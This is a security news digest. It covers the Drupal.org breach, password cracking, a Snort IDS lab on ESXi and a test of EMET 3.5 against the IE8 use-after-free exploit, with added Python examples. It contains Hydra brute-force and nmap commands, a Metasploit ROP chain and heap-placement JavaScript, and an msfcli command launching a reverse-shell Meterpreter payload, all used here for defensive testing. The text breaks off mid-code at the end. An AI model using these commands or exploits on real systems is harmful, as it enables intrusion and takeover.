Hackin9

The Drupal security team has identified a breach in their environment that disclosed passwords.  As their notification (https://drupal.org/news/130529SecurityUpdate) states, most of the passwords were salted and hashed; older passwords were not (although common practice is to store the salt value in the same table as the password, so that might not actually help much).  According to the update they are still investigating what else may have been accessed.  If you have one of those accounts, happy password changing.  If you use that password anywhere else (and of course you don't) you might want to change that whilst you are at it.  

From the perspective of letting people know, I must say I'm quite impressed.  They notified fairly early on, and they provide some details of the incident, steps to take, and actions they are taking.  Of the breach notifications I have seen recently, this is one of the more complete and useful ones.  

Cheers

Mark H

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Drupal.org has reset account passwords after it found unauthorized access to information on its servers.
 

Security goes military at CeBIT
iT News
It certainly helped perpetuate the cyber fear doing the rounds of late, with a few subtle reminders that infosec is being militarised — including an attempt by the Australia's Defence Signals Directorate (DSD) to ban the media from its opening keynote ...

 
LinuxSecurity.com: A vulnerability has been discovered and corrected in socat: Under certain circumstances an FD leak occurs and can be misused for denial of service attacks against socat running in server mode (CVE-2013-3571). [More...]
 
LinuxSecurity.com: Multiple vulnerabilities have been discovered and corrected in socat: A heap based buffer overflow vulnerability has been found with data that happens to be output on the READLINE address. Successful exploitation may allow an attacker to execute arbitrary code with [More...]
 
LinuxSecurity.com: USN-1831-1 introduced a regression in OpenStack Nova.
 
LinuxSecurity.com: Updated tomcat6 packages that fix two security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having [More...]
 
LinuxSecurity.com: An updated haproxy package that fixes one security issue is now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate [More...]
 
LinuxSecurity.com: Updated tomcat5 packages that fix one security issue are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having [More...]
 
LinuxSecurity.com: Several security issues were fixed in Tomcat.
 
LinuxSecurity.com: Several security issues were fixed in the kernel.
 
LinuxSecurity.com: Updated python-httplib2 packages fix security vulnerability: httplib2 only validates SSL certificates on the first request to a connection, and doesn't report validation failures on subsequent requests (CVE-2013-2037). [More...]
 
LinuxSecurity.com: Updated openvpn package fixes security vulnerability: OpenVPN 2.3.0 and earlier running in UDP mode are subject to chosen ciphertext injection due to a non-constant-time HMAC comparison function. Plaintext recovery may be possible using a padding oracle [More...]
 
LinuxSecurity.com: A privilege escalation vulnerability has been found in SPIP, a website engine for publishing, which allows anyone to take control of the website. [More...]
 
Data-center and wireless sales led growth at Cisco Systems in its fiscal third quarter, as it saw customers spending more in the U.S. and developing countries but reported continuing weakness in Southern Europe.
 


 
LinuxSecurity.com: KDE-Libs could be made to expose web credentials.
 

Passwords for almost one million accounts on the Drupal.org website are being reset after hackers gained unauthorized access to sensitive user data.

Drupal.org is the official website for the popular open-source content management platform. The breach is the result of an attack that exploited a vulnerability in an undisclosed third-party application, not in Drupal itself, Holly Ross, executive director of the Drupal Association, wrote in a blog post published Wednesday. The hack exposed usernames, e-mail addresses, country information, and cryptographically hashed passwords, although investigators may discover additional types of information were compromised.

"Malicious files were placed on association.drupal.org servers via a third-party application used by that site," Ross wrote. "Upon discovering the files during a security audit, we shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files. The Drupal Security Team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability."


 

Attackers are exploiting an extremely critical vulnerability in the Ruby on Rails framework to commandeer servers and make them part of a malicious network of hacked machines, a security researcher said.

Ars first warned of the threat in early January, shortly after Rails maintainers issued a patch for the vulnerability. Ars warned at the time that the vulnerability gave attackers the ability to remotely execute malicious code on underlying servers. Criminals' success in exploiting the bug to make vulnerable machines join a botnet suggests that many server administrators still haven't installed the critical update more than four months after it was issued.

Servers that have been exploited are infected with software that caused them to join an Internet Relay Chat (IRC) channel on one of at least two servers, security researcher Jeff Jarmoc said in a post published Tuesday to his personal website. Attackers can force servers to download and execute malicious code and join new IRC channels from there. The channels required no authentication to be accessed, making it possible for competing attackers to infiltrate the chat room and take control of the compromised servers. IRC-based botnets harken back to the earlier days of computer crime because they made it easy for "script kiddies," or relatively unskilled hackers, to control huge numbers of infected machines in lock step, using a handful of pre-programmed commands.


 
Thanks to the XKCD comic, every password cracking word list in the world probably has correcthorsebatterystaple in it already.

In March, readers followed along as Nate Anderson, Ars deputy editor and a self-admitted newbie to password cracking, downloaded a list of more than 16,000 cryptographically hashed passcodes. Within a few hours, he deciphered almost half of them. The moral of the story: if a reporter with zero training in the ancient art of password cracking can achieve such results, imagine what more seasoned attackers can do.

Imagine no more. We asked three cracking experts to attack the same list Anderson targeted and recount the results in all their color and technical detail Iron Chef style. The results, to say the least, were eye opening because they show how quickly even long passwords with letters, numbers, and symbols can be discovered.

The list contained 16,449 passwords converted into hashes using the MD5 cryptographic hash function. Security-conscious websites never store passwords in plaintext. Instead, they work only with these so-called one-way hashes, which are incapable of being mathematically converted back into the letters, numbers, and symbols originally chosen by the user. In the event of a security breach that exposes the password data, an attacker still must painstakingly guess the plaintext for each hash—for instance, they must guess that "5f4dcc3b5aa765d61d8327deb882cf99" and "7c6a180b36896a0a8c02787eeafb0e4c" are the MD5 hashes for "password" and "password1" respectively. (For more details on password hashing, see the earlier Ars feature "Why passwords have never been weaker—and crackers have never been stronger.")
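The paragraph above explains why unsalted MD5 falls so quickly: a single precomputed table answers every leaked hash with one lookup. The following added example (written for this page, not Ars Technica's or the crackers' code) checks the two MD5 values quoted above against a small constructed wordlist, then shows the storage scheme that removes the shortcut: a random per-user salt plus a deliberately slow KDF (PBKDF2-HMAC-SHA256), verified with a constant-time comparison. The wordlist, the iteration count and the `guess_cost` work model are assumptions of this example.

```python
import hashlib
import hmac
import os

# The two unsalted MD5 digests quoted in the article, plus a small constructed wordlist.
LEAKED_MD5 = ["5f4dcc3b5aa765d61d8327deb882cf99", "7c6a180b36896a0a8c02787eeafb0e4c"]
WORDLIST = ["letmein", "correcthorsebatterystaple", "password", "password1"]


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def precomputed_table(words):
    """Hash every candidate once; with unsalted MD5 one table serves any number of leaked hashes."""
    return {md5_hex(w): w for w in words}


def recover_unsalted(hashes, words):
    """One dictionary lookup per leaked hash: no per-hash work at all."""
    table = precomputed_table(words)
    return {h: table.get(h) for h in hashes}


def store_password(password, iterations=100_000):
    """Hardened storage: random per-user salt plus a slow KDF (PBKDF2-HMAC-SHA256).
    The salt is stored beside the digest; it does not need to be secret, only unique,
    because it forces every guess to be recomputed for every record."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_password(record, candidate):
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(digest, record["digest"])


def guess_cost(n_records, n_words, iterations, salted):
    """Hash computations needed to test n_words against n_records (assumed cost model).
    Unsalted fast hash: hash the wordlist once, then look every record up.
    Salted slow KDF: each (record, word) pair needs its own run of `iterations` rounds."""
    if not salted:
        return n_words
    return n_records * n_words * iterations


if __name__ == "__main__":
    print(recover_unsalted(LEAKED_MD5, WORDLIST))
    rec = store_password("password")
    print(verify_password(rec, "password"), verify_password(rec, "password1"))
    print(guess_cost(16449, len(WORDLIST), 1, salted=False),
          guess_cost(16449, len(WORDLIST), rec["iterations"], salted=True))
```

Two users who choose the same password get different stored digests, so the precomputed table built for the MD5 list matches nothing in the salted store, and the cost of testing the wordlist scales with the number of records times the iteration count instead of being paid once.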


 
US federal prosecutors have unsealed the indictment of seven men who were allegedly involved in the digital currency and exchange service. The service is believed to have laundered more than $6 billion since 2006
    


 
Increasingly, criminals have been trying to exploit a vulnerability in the web application framework to compromise servers. Successful intruders install a bot that waits for further instructions on IRC
    


 
Attackers have been able to remotely disable the web application firewall using crafted HTTP requests
    


 

 
WhatsApp alternative Threema offers end-to-end encryption, so that only the intended recipient is able to decrypt messages. The cryptographic IM app was previously only on iOS, but an Android version is now available
    


 
It has long been known that US defence contractors have been victims of cyber-espionage. The Washington Post has now uncovered that this has reportedly enabled China to save itself 25 years of military research
    


 
The internet payment processing service, part of eBay, does not check search strings, allowing attackers to inject arbitrary JavaScript into the user's browser. The issue can be exploited to steal access credentials
    


 
The Australian CERT has analysed previously unpublished Internet Census 2012 data. The team's findings indicate that security problems aren't caused by "stupid" users, but that they occur because of flawed coding and careless factory settings
    


 
Drupal Edit Limit Module Access Bypass Vulnerability
 
F-Secure Multiple Products ActiveX Remote Code Execution Vulnerability
 
libguestfs 'inspect-fs.c' Double Free Local Denial of Service Vulnerability
 
[ MDVSA-2013:170 ] socat
 
[ MDVSA-2013:169 ] socat
 
CA20130528-01: Security Notice for CA Process Automation (CA PAM)
 
[SECURITY][CVE-2013-2765][ModSecurity] Remote Null Pointer Dereference
 
Drupal Node Access User Reference Module Access Bypass Vulnerability
 
New features for detecting and analyzing malware in Sourcefire's FireAMP and FirePOWER products supplement flagging signature-based antimalware.

 
Though the Spamhaus DDoS attack showed the potential devastation of increasing bandwidth, DDoS attack trends show DDoS type to be just as important.

 
The software giant's May 2013 Patch Tuesday update permanently fixes the IE8 zero-day flaw found in the Dept. of Labor website attack.

 
US federal authorities have charged eight hackers in connection with a $45m debit card fraud scheme

 
The IE8 zero-day attack planted in the U.S. Labor Department's website highlights how few organizations can ward off never-before-seen attacks.

 
Microsoft released a temporary fix to mitigate attacks using the most recent Internet Explorer 8 zero day vulnerability.

 
McAfee has announced an agreement to acquire next-gen firewall maker Stonesoft for $389 million.

 
The Chinese government's alleged cyber-espionage arm remains active after a quiet period, using the same tactics revealed in Mandiant's APT1 report.

 
The US Department of Defense (DoD) has approved BlackBerry and Samsung mobile devices for use on its networks

 
A survey released by WhiteHat Security finds that website vulnerabilities have decreased steadily in recent years, though problems persist.

 
McAfee introduces two new identity and access management (IAM) products.

 
The yet-unnamed certification will seek to validate skills of cloud security pros, but it's unclear how it may complement or overlap with existing certs.

 
Security researcher HD Moore says 114,000 serial devices exposed to the Internet are highly hackable.

 
Verizon's annual breach report highlights a spate of new security research reports. However, overall conclusions from these are hard to come by.

 
The attack seeks to compromise a Twitter webpage via a man-in-the-browser attack. Trusteer warns it could be a harbinger of broader future attacks.

 
The 2013 Verizon data breach report details how authentication attacks affect organizations of all sizes, blaming single-factor passwords.

 
Verizon's 2013 breach report shows most breaches are caused by a select few attack types, and the majority of breaches aren't detected for months.

 
Verizon's annual breach report indicates outsiders still cause most breaches, and despite no one-size-fits-all defense, better risk awareness can help.

 
Big Yellow's annual report indicates a threefold rise in targeted attacks against SMBs as attackers search beyond big firms for susceptible targets.

 
Emerging enterprise antiphishing tools use testing, training to help users recognize bogus messages, addressing a long-standing defensive pain point.

 

This is a guest diary by Basil Alawi

One of the challenges that face security administrators is deploying an IDS in a modern network infrastructure. Unlike hubs, switches don't forward every packet to every port. A SPAN port or network TAPs can be used as a workaround in a switched environment.

Fortunately, with VMware ESX/ESXi infrastructure we can configure a group of ports to see all network traffic traversing the virtual switch.

"Promiscuous mode is a security policy which can be defined at the virtual switch or portgroup level in vSphere ESX/ESXi. A virtual machine, Service Console or VMkernel network interface in a portgroup which allows use of promiscuous mode can see all network traffic traversing the virtual switch".

By default the promiscuous mode policy is set to Reject.

To enable promiscuous mode:

  1. Log into the ESXi/ESX host or vCenter Server using the vSphere Client.
  2. Select the ESXi/ESX host in the inventory.
  3. Click the Configuration tab.
  4. In the Hardware section, click Networking.
  5. Click Properties of the virtual switch for which you want to enable promiscuous mode.
  6. Select the virtual switch or portgroup you wish to modify and click Edit.
  7. Click the Security tab.
  8. From the Promiscuous Mode dropdown menu, click Accept.

Performance issues:

Using the VMXNET 3 vNIC provides better performance than other vNIC types (Figure 1).

Figure 1(VMXNET 3)

Reserving memory and CPU resources is highly recommended to make sure that the resources will be available when they are needed (Figure 2).

Figure 2(Reserved Memory)

 

The test lab setup

 

The test lab consists of VMware ESXi, Kali Linux, Security Onion and Metasploitable. ESXi 5.1 will be the host system and the Kali VM will be the attack server, while Metasploitable will be the victim and Security Onion will run the Snort instance (see Figure 3).

Figure 3 (Test Lab)

Test Lab Network Diagram

 

The Network Configuration

For this experiment the vSwitch has been configured with two port groups. In the "Virtual Machines" port group the promiscuous mode policy is left at the default value "Reject". The second port group, "Promiscuous", has promiscuous mode set to "Accept" (see Figure 4).

Figure 4 (Vswitch Configuration)

Security Onion has been configured with two network interfaces: eth0 for management, with IP 192.168.207.12, and eth1 without an IP address. eth0 is connected to the "VM Network" port group and eth1 is connected to the "Promiscuous" port group.
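Promiscuous mode is a security policy, and it should end up enabled on exactly one port group: the sensor's. The added example below (not part of this diary or of VMware's tooling) audits that. It parses a constructed text in the shape of the `esxcli network vswitch standard policy security get` and `... portgroup policy security get` output, with a `[kind name]` header invented here so one string can carry the vSwitch and every port group, resolves the vSphere inheritance rule (a port group inherits the vSwitch value unless it overrides it), and reports any port group that can sniff traffic but is not the designated sensor group. The values mirror this lab, plus a deliberately misconfigured extra port group "Dev Lab" so the audit has something to flag; the field labels and headers are assumptions of this example.

```python
import re

_BOOL = {"true": True, "false": False}

# Constructed sample (not real host output). The vSwitch rejects promiscuous mode,
# "Promiscuous" overrides it to Accept, "VM Network" inherits the vSwitch default and
# "Dev Lab" is an extra, misconfigured port group that also overrides it to Accept.
SAMPLE = """\
[vswitch vSwitch0]
   Allow Promiscuous: false
   Allow MAC Address Change: true
   Allow Forged Transmits: true
[portgroup VM Network]
   Allow Promiscuous: false
   Allow MAC Address Change: true
   Allow Forged Transmits: true
   Override Vswitch Allow Promiscuous: false
   Override Vswitch Allow MAC Address Change: false
   Override Vswitch Allow Forged Transmits: false
[portgroup Promiscuous]
   Allow Promiscuous: true
   Allow MAC Address Change: true
   Allow Forged Transmits: true
   Override Vswitch Allow Promiscuous: true
   Override Vswitch Allow MAC Address Change: false
   Override Vswitch Allow Forged Transmits: false
[portgroup Dev Lab]
   Allow Promiscuous: true
   Allow MAC Address Change: true
   Allow Forged Transmits: true
   Override Vswitch Allow Promiscuous: true
   Override Vswitch Allow MAC Address Change: false
   Override Vswitch Allow Forged Transmits: false
"""


def parse_policies(text):
    """Split the sectioned text into {(kind, name): {field: bool}}."""
    sections = {}
    current = None
    for line in text.splitlines():
        header = re.match(r"\[(vswitch|portgroup) (.+)\]$", line.strip())
        if header:
            current = (header.group(1), header.group(2))
            sections[current] = {}
            continue
        field = re.match(r"\s*([^:]+):\s*(true|false)\s*$", line)
        if field and current is not None:
            sections[current][field.group(1).strip()] = _BOOL[field.group(2)]
    return sections


def effective_promiscuous(vswitch, portgroup):
    """vSphere semantics: a port group inherits the vSwitch policy unless it overrides it."""
    if portgroup.get("Override Vswitch Allow Promiscuous", False):
        return portgroup["Allow Promiscuous"]
    return vswitch["Allow Promiscuous"]


def audit_promiscuous(text, sensor_portgroups):
    """Return which port groups can sniff, which should not, and sensors that cannot."""
    sections = parse_policies(text)
    vswitches = [pol for (kind, _), pol in sections.items() if kind == "vswitch"]
    if len(vswitches) != 1:
        raise ValueError("expected exactly one vswitch section")
    vswitch = vswitches[0]
    allowed = sorted(
        name for (kind, name), pol in sections.items()
        if kind == "portgroup" and effective_promiscuous(vswitch, pol)
    )
    return {
        "promiscuous": allowed,
        "unexpected": sorted(set(allowed) - set(sensor_portgroups)),
        "sensor_not_promiscuous": sorted(set(sensor_portgroups) - set(allowed)),
    }


if __name__ == "__main__":
    print(audit_promiscuous(SAMPLE, {"Promiscuous"}))
```

Run periodically against the real host output, the "unexpected" list is the finding: any VM attached to such a port group sees every frame on the vSwitch, including the management traffic on eth0-style interfaces.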

 

 

 

Testing Snort:

 

The first test is scanning the Metasploitable VM with Nmap by running the command below; Snort detected this attempt successfully (Figure 5).

nmap 192.168.207.20

 

 

Figure 5 (Snort alerts for Nmap scans)

 

The second test is trying to brute-force the Metasploitable root password using Hydra (Figure 6):

 

hydra -l root -P passwordslist.txt 192.168.207.20 ftp

 

 

 

Figure 6  (Hydra brute force alerts)

 

The third attempt was using Metasploit to exploit Metasploitable (see Figure 7).

Figure 7  (metasploit alerts)
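The three figures above show Snort alerts for a scan, a brute-force run and an exploit attempt. The added example below (written for this page, not part of the diary or of Security Onion) parses alerts in Snort's `alert_fast` line format, summarises them per source host and signature, and applies a sliding-window count to pick out the brute-force pattern from the Hydra test. The alert lines are constructed for this example, with messages made up and SIDs in the local-rule range (1000000 and up); the threshold and window are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Snort alert_fast layout: timestamp, [gid:sid:rev], message, optional classification,
# priority, protocol and endpoints (ports are absent for ICMP).
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<pri>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Constructed alert lines for the three lab tests: an Nmap scan, six failed FTP logins
# from the Hydra run, and one exploit attempt. Not real sensor output.
SAMPLE_ALERTS = """\
05/29-10:01:02.100000  [**] [1:1000001:1] LAB ICMP PING NMAP [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.207.11 -> 192.168.207.20
05/29-10:01:03.200000  [**] [1:1000002:1] LAB SYN probe to closed port [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.207.11:40001 -> 192.168.207.20:23
05/29-10:01:03.300000  [**] [1:1000002:1] LAB SYN probe to closed port [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.207.11:40002 -> 192.168.207.20:111
05/29-10:05:10.000000  [**] [1:1000003:1] LAB FTP failed login [**] [Classification: Misc Attack] [Priority: 2] {TCP} 192.168.207.11:50001 -> 192.168.207.20:21
05/29-10:05:11.000000  [**] [1:1000003:1] LAB FTP failed login [**] [Classification: Misc Attack] [Priority: 2] {TCP} 192.168.207.11:50002 -> 192.168.207.20:21
05/29-10:05:12.000000  [**] [1:1000003:1] LAB FTP failed login [**] [Classification: Misc Attack] [Priority: 2] {TCP} 192.168.207.11:50003 -> 192.168.207.20:21
05/29-10:05:13.000000  [**] [1:1000003:1] LAB FTP failed login [**] [Classification: Misc Attack] [Priority: 2] {TCP} 192.168.207.11:50004 -> 192.168.207.20:21
05/29-10:05:14.000000  [**] [1:1000003:1] LAB FTP failed login [**] [Classification: Misc Attack] [Priority: 2] {TCP} 192.168.207.11:50005 -> 192.168.207.20:21
05/29-10:05:15.000000  [**] [1:1000003:1] LAB FTP failed login [**] [Classification: Misc Attack] [Priority: 2] {TCP} 192.168.207.11:50006 -> 192.168.207.20:21
05/29-10:09:00.000000  [**] [1:1000004:1] LAB exploit attempt against FTP service [**] [Priority: 1] {TCP} 192.168.207.11:50100 -> 192.168.207.20:21
"""


def parse_alert(line):
    """Return a dict for one alert_fast line, or None if the line does not match."""
    m = ALERT_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["time"] = datetime.strptime(d["ts"], "%m/%d-%H:%M:%S.%f")  # format carries no year
    d["sid"] = int(d["sid"])
    d["priority"] = int(d["pri"])
    return d


def parse_alerts(text):
    return [a for a in (parse_alert(line) for line in text.splitlines()) if a]


def summarize(alerts):
    """Counts per source host and per signature, the view the figures above give."""
    return {
        "by_source": Counter(a["src"] for a in alerts),
        "by_target": Counter(a["dst"] for a in alerts),
        "by_signature": Counter(a["msg"] for a in alerts),
    }


def brute_force_candidates(alerts, sid, threshold=5, window_seconds=60):
    """(src, dst, count) pairs that fire `sid` at least `threshold` times within any
    window_seconds span. Two-pointer sweep over the sorted timestamps of each pair."""
    per_pair = defaultdict(list)
    for a in alerts:
        if a["sid"] == sid:
            per_pair[(a["src"], a["dst"])].append(a["time"])
    flagged = []
    for (src, dst), times in per_pair.items():
        times.sort()
        best, j = 0, 0
        for i in range(len(times)):
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_seconds:
                j += 1
            best = max(best, j - i)
        if best >= threshold:
            flagged.append((src, dst, best))
    return flagged


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    print(summarize(alerts))
    print(brute_force_candidates(alerts, sid=1000003))
```

The per-signature counter reproduces what the console shows; the windowed count is the extra step that turns six individual "failed login" alerts into one brute-force finding against 192.168.207.20, which is the kind of correlation a sensor operator adds on top of raw Snort output.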

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
 

Following is a guest post from TJ O'Connor, @ViolentPython (http://www.linkedin.com/pub/tj-oconnor/43/37/81b), author of Violent Python, SANS Technical Institute graduate, and GSE.

 
What do Nuclear Scientists, Microsoft, and Metasploit have to do with keeping me honest? As everyone was celebrating the New Year on January 1st of this year, my buddy Russ McRee posted some of my rambling thoughts to the Internet Storm Center about how EMET could protect against unknown future attacks (0-days). At the time, I tested Microsoft Enhanced Mitigation Experience Toolkit (EMET) 3.5 Tech Preview against CVE-2012-4792, found rigged on the Council of Foreign Relations website. It is fair to say that at that time I was working from a very biased perspective. The attack had already occurred and it was easy to look back in time and say EMET would have been successful in protecting against it. As every armchair quarterback knows, it is easy to look into the past. However, as the boastful and arrogant person I can sometimes be, I claimed EMET could stop future attacks against novel exploits (0-days) as well.  On the podcast the following day, Johannes noted my work and effectively said only time will tell. 
 
Well, fast forward four months. Chinese hackers from the Deep Panda group successfully injected a novel exploit into the Department of Labor's website on May 1st, 2013. Arguably, the attack was directed at scientists that likely work in nuclear weapons research, based on the content of the page. 
 
 
Figure 1: Infected DOE Web Page as seen on May 1, 2003
 
Maintaining the shift of attacks seen in early 2012, the attackers continued their campaign of watering-hole attacks. Described in a report by Symantec , the term watering hole makes reference to a hunting technique. Rather than search for the herd throughout the forest, hunters sit idly by at the watering hole, knowing the animals will eventually come to drink. Applied to hacking, watering hole attacks apply the same concept: infect a place where you know your target will visit. In the case of the May 1st attack, Deep Panda hoped nuclear scientists would visit a page on dealing with possible exposure to nuclear materials.
 
After successful exploitation, the exploit downloaded a variant of the Poison IVY Remote Access Toolkit (RAT) (http://www.poisonivy-rat.com), checked for the presence of and attempted to kill popular anti-virus (Avira, Bitdefender, AVG, ESET, Avira, Dr. Web, Sophos, F-Secure, Kaspersky). I’m making assumptions here, but at this point handlers from Deep Panda probably took over the target and began pillaging intellectual property and personal secrets belonging to the scientists. For further information about the attack, check out some great blog posts by Invincea and AlienVault 
 
Would EMET 3.5 have stopped the attack as I predicted four months earlier? Yes, I am fully aware EMET 4v Beta is available for download.  But I am trying to remain honest to my words from January 1st. Let's see. The team at Metasploit reproduced the exploit used in the attack and posted the source.
 
Examining the source code of the Metasploit version of the exploit (dubbed cgenericelement_uaf since it is a use-after-free for cgenericelement), it appears the attack compromises only targets running Internet Explorer 8 on Windows XP SP3, Vista, Server 2003, or Windows 7 machines. Let's examine a couple of minor aspects of the exploit. First, the authors (Sinn3r, Juan Vazquez, and EMH) wrote the exploit to bypass Data Execution Protection using a ROP chain. This can be seen in Figure 2. In fact, it again uses the msvcrt.dll ROP chain. 
 
rop_payload = ''

case t['Rop']
when :msvcrt
  algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
  chain = ''

  if t.name == 'IE 8 on Windows XP SP3'
    chain =
    [
      0x77c1e844, # POP EBP # RETN [msvcrt.dll]
      0x77c1e844, # skip 4 bytes [msvcrt.dll]
      0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
      0xffffffff,
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
      0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
      0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
      0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN
      0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
      0x77c3048a, # POP EDI # RETN [msvcrt.dll]
      0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
      0x77c46efb, # POP ESI # RETN [msvcrt.dll]
      0x77c2aacc, # JMP [EAX] [msvcrt.dll]
      0x77c3b860, # POP EAX # RETN [msvcrt.dll]
      0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
      0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
      0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
    ].pack("V*")

<..SNIPPED..>

rop_payload = chain + algin + payload.encoded
 
Figure 2: Msvcrt.dll ROP Chain Creation in ie_cgenericelement_uaf Exploit
 
Next, the authors used a newly developed Mstime No-Spray Technique to place the encoded payload into the heap. What’s interesting to note is that the new technique for placing shellcode into the heap was only integrated into the Metasploit Framework on April 1st, 2013 by wchen. (https://gist.github.com/wchen-r7/ac29eb40fb33ddb5ab29). Using the CTIMEAnimationBase in Mstime, the technique allocates an array of pointers to controllable strings. As this exploit demonstrates, this only works against Internet Explorer 8 or prior, since IE 9 does not support the function in Mstime. 
 
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
  sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");

magenta = unescape("#{align_esp}");

<..SNIPPED..>

mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 
Figure 3: Mstime No-Spray Technique in ie_cgenericelement_uaf Exploit
 
So if you put the pieces together, we have a novel exploit (i.e. an exploit without a signature), use of the msvcrt.dll ROP chain, a novel method for placing shellcode into the heap (novel by the standards of EMET 3.5) and some shellcode to execute the Meterpreter. Let's fire up the exploit and browse to it. Figure 4 shows how to start the exploit from the Metasploit framework. Here we will stand up an instance of the exploit on a web server on TCP port 8080, and have our payload (the Meterpreter) call back on TCP port 4444. 
 
msfcli exploit/windows/browser/ie_cgenericelement_uaf SRVHOST=10.10.10.104 SRVPORT=8080 PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.10.104 E
 
Figure 4: Launching the ie_cgenericelement_uaf Exploit From Metasploit
 
We browse the new target at http://10.10.10.104:8080/dol with a victim Internet Explorer 8 on an unpatched Windows XP SP3 and see that the exploit successfully executes its payload, establishing a Meterpreter session on the victim.
 
 
Figure 5: Successful Compromise Using ie_cgenericelement_uaf Exploit
 
Ok, so we know the exploit works. Now let's install EMET 3.5 and repeat the exercise. We'll begin by enabling all the protection mechanisms that EMET provides. 
 
Figure 6: Enabling All EMET Protection Mechanisms For Internet Explorer
 
With EMET 3.5 installed, we attempt the exploit again and EMET 3.5 immediately detects the Stack Pivot included in the msvcrt.dll ROP chain. 
 
Figure 7: StackPivot Detected By EMET 3.5
 
Next, we disable the StackPivot detection and protection mechanism in EMET and repeat. This time, the exploit successfully begins the ROP chain but is stopped at 0x77c1110c when the chain attempts to call VirtualAlloc() in an attempt to bypass Data Execution Protection (DEP). EMET 3.5 uses a mechanism to detect who is calling VirtualAlloc() and does not permit it to be called outside of the kernel.  
 
 
Figure 8: VirtualAlloc() Caller Checking in EMET 3.5
 
Ok, we disable the Caller Checking functionality and repeat. This time, the ROP chain again fails when SimExecFlow detects ROP gadgets in use. SimExecFlow simulates the execution flow after the return address and detects subsequent ROP gadgets. Essentially, EMET 3.5 looks at the stack, sees a series of addresses that each point to a couple of instructions followed by a RET-like instruction, and identifies the ROP chain. Ok, so this won't work. 
 
 
Figure 9: SimExecFlow Detecting ROP Gadgets in Use
 
We disable SimExecFlow checking and run the exploit again. This time, the exploit steps the entire way through our ROP chain and successfully places our shellcode into a region of executable memory. However, as soon as the shellcode begins to execute we are presented with a new error message. 
 
 
Figure 10: Export Address Table Access Filtering in EMET 3.5
 
We are reminded that in order to do anything useful with shellcode (downloading a stager, adding a registry key, adding a user), we need to make calls to the Windows API. By accessing the export address table, shellcode can determine the location of useful APIs (most commonly in kernel32.dll or ntdll.dll). Without accessing the export address table, it proves difficult to find the location of specific required API calls. And thus, EMET 3.5 successfully detects this behavior and stops the shellcode from executing further. So with several protection mechanisms disabled, EMET completely misses the exploit but catches and stops its payload. 
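The sequence above walks through StackPivot, Caller check and EAF, each catching the same attack at a different stage. The added example below is a simplified Python model of those three checks, written for this page; it is not EMET's code and not the Metasploit module, and SimExecFlow (which requires emulating the instruction stream) is left out. It assumes a thread stack range, a heap range, a kernel32 image with a constructed export-table range, and a tiny constructed byte map that contains one legitimate CALL site and the post's `push esp # ret` gadget address with non-CALL bytes in front of it. `run_scenario` replays the post's experiment: each check fires unless it has been disabled, and the function reports which one stops the attack.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Region:
    """A half-open address range [start, end) with a label."""
    name: str
    start: int
    end: int

    def contains(self, addr):
        return self.start <= addr < self.end


# --- StackPivot: at a critical API call, ESP must lie inside the thread's own stack
#     as recorded in the TIB (StackLimit <= ESP < StackBase). A chain that has moved
#     ESP onto the heap fails this test. ---
def stack_pivot_detected(esp, stack_limit, stack_base):
    return not (stack_limit <= esp < stack_base)


# --- Caller check: the API must have been reached through a CALL, so the return address
#     on the stack must directly follow one. A ROP chain reaches the API through RETN, so
#     the "return address" is just the next gadget and has no CALL in front of it. ---
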